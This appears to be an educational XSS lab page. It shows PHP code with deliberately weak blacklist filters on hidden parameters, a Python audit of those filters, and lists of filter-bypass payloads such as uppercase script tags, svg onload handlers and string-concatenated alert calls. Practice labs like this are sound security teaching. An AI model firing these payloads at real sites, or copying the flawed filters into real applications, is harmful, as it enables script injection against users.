Multi-Filter XSS Lab

Test XSS against multiple different filtering techniques

Multi-Filter Challenge

Lab Overview

This lab demonstrates multiple different filtering approaches with various transformation techniques, creating a comprehensive XSS testing environment.

Multiple Filter Types: This application uses four different filtering strategies across different parameters, including HTML encoding and string transformations.
Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them!
# use arjun tool to find hidden parameter
Multiple Filtering Methods:
  • Secure (fname, lname): uses htmlspecialchars()
  • Quote Injection (button): replaces the strings 'script', 'img', 'image' with '">?'
  • Secure (categoryid): uses htmlentities()
  • Break Tag Filter (color): replaces the strings 'alert', 'confirm' with '<br>'
Filter Transformations:
  Parameter  Input example               After filter            Transformation
  button     <script>alert(1)</script>   <">?>alert(1)</">?>     'script' → '">?'
  color      alert(1);confirm(2)         <br>(1);<br>(2)         'alert','confirm' → '<br>'
Filter Complexity: Multiple Filter Types

Objective: Test XSS payloads against all filtering methods and find ways to bypass each specific filter implementation.

Backend Source Code
// fname / lname: context-aware output encoding, quotes included
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// button: case-sensitive blacklist, replaced with a string that itself contains HTML metacharacters
elseif(isset($_GET["button"])){
    $arr = array('script','img','image');
    $re = str_replace($arr, '">?', $_GET['button']);
    echo $re;
}
// categoryid: encodes all characters that have a named entity
elseif(isset($_GET["categoryid"])){
    echo htmlentities($_GET["categoryid"], ENT_QUOTES);
}
// color: case-sensitive blacklist of two function names, replaced with a raw tag
elseif(isset($_GET["color"])){
    $arr = array('alert','confirm');
    $color = str_replace($arr, '<br>', $_GET['color']);
    echo $color;
}
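As an added example (not the lab's own code), the Python below models the backend filters above, mirroring PHP htmlspecialchars() with ENT_QUOTES and array-form str_replace() (case-sensitive, one pass per search word), and audits which of this page's sample inputs each filter leaves with raw HTML metacharacters. Function names such as audit() and raw_metachars() are my own.

```python
# Added example: model the lab's output filters and check what they really neutralise.

# PHP htmlspecialchars() with ENT_QUOTES encodes exactly these five characters.
_PHP_ENTITIES = {"&": "&amp;", '"': "&quot;", "'": "&#039;", "<": "&lt;", ">": "&gt;"}


def htmlspecialchars(s: str) -> str:
    """Context-aware output encoding for an HTML body or attribute value."""
    return "".join(_PHP_ENTITIES.get(ch, ch) for ch in s)


def php_str_replace(words, repl: str, s: str) -> str:
    """Mirror PHP str_replace(array, string, subject): each word is replaced in
    order, case-sensitively, and text already replaced is not re-scanned."""
    for w in words:
        s = s.replace(w, repl)
    return s


def button_filter(s: str) -> str:
    """The lab's 'button' filter: the replacement string itself contains '"' and '>'."""
    return php_str_replace(["script", "img", "image"], '">?', s)


def color_filter(s: str) -> str:
    """The lab's 'color' filter: the replacement string is a raw tag."""
    return php_str_replace(["alert", "confirm"], "<br>", s)


def raw_metachars(out: str) -> set:
    """HTML metacharacters still present unencoded after filtering. Any raw '<'
    in body context can open a tag; a raw quote matters once the value is
    echoed inside an attribute."""
    return {ch for ch in out if ch in '<>"\''}


def audit(filter_fn, samples):
    """Map each input to the metacharacters its filtered output still carries;
    an empty set means the filter neutralised that input."""
    return {s: raw_metachars(filter_fn(s)) for s in samples}


if __name__ == "__main__":
    # Constructed sample inputs, taken from the payload lists on this page.
    samples = ["<script>alert(1)</script>", "<SCRIPT>alert(1)</SCRIPT>", "script"]
    for name, fn in [("htmlspecialchars", htmlspecialchars), ("button filter", button_filter)]:
        for inp, leaked in audit(fn, samples).items():
            print(f"{name:17} {inp!r:28} -> {fn(inp)!r:36} raw: {sorted(leaked)}")
```

The encoding filter leaves no raw metacharacters for any input, while the blacklist filter passes the upper-case variant untouched and turns the bare word script into output containing a quote and a '>' that the input never had.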
Test Input Forms
Visible Parameters (HTML Encoded)
  • fname: this parameter uses htmlspecialchars() encoding
  • lname: this parameter uses htmlspecialchars() encoding
Hidden Parameters
Hint: The 'button', 'categoryid', and 'color' parameters are not shown in the main form but are implemented in the backend with various filtering methods.
  • button: this parameter replaces 'script', 'img', 'image' with '">?'
  • categoryid: this parameter uses htmlentities() encoding
  • color: this parameter replaces 'alert', 'confirm' with '<br>'
Multi-Filter Bypass Techniques
Button Parameter Bypasses:
  • Case variation: Use <SCRIPT>, <Script>
  • Alternative tags: Use <svg>, <body>, <iframe>
  • Exploit transformation: The '">?' replacement might help close attributes
    Example: script becomes ">? which might close an attribute
Color Parameter Bypasses:
  • Alternative functions: Use prompt, console.log, document.write
  • Function obfuscation:
    • window['al'+'ert'](1)
    • eval('al'+'ert(1)')
    • Function('al'+'ert(1)')()
  • Exploit replacement: Use payloads where '<br>' creates valid syntax
General Bypass Techniques:
  • Encoding: Use HTML entities, Unicode, or Base64 encoding
  • Context switching: Use different execution contexts (HTML, JavaScript, CSS)
  • Event handlers: Use onload, onerror, onmouseover without blocked functions
  • JavaScript protocol: Use javascript:alert(1) in href or src attributes
Security Implications

Multiple filtering approaches demonstrate:

  • Different filters require different bypass techniques
  • Transformation filters can create new attack vectors
  • Quote injection filters might help close attributes
  • Break tag replacement can break JavaScript but might be exploitable
  • Multiple security controls increase complexity but not necessarily security
  • Proper output encoding is still the most reliable defense
Best Practices

For secure web applications:

  • Use consistent context-aware output encoding
  • Implement strict Content Security Policy (CSP) headers
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Avoid transformation filters that can be exploited
  • Conduct comprehensive security testing with various payloads
  • Use security headers such as X-Content-Type-Options (X-XSS-Protection is deprecated and ignored by current browsers; rely on CSP instead)
Payload Examples for Multi-Filter
Button Parameter Payloads:
  • <SCRIPT>alert(1)</SCRIPT> - Uppercase bypass
  • <svg onload=alert(1)> - Alternative tag
  • <body onload=alert(1)> - Body tag with event
  • script - Test transformation behavior
Color Parameter Payloads:
  • prompt(1) - Alternative function
  • console.log(1) - Console output
  • window['al'+'ert'](1) - String concatenation
  • eval('al'+'ert(1)') - Using eval
Advanced Exploitation Payloads:
  • DOM-based: Payloads that leverage DOM manipulation
  • Template injection: Payloads that use template literals
  • Property injection: Payloads that set object properties
  • Protocol handlers: Payloads that use data: or javascript: protocols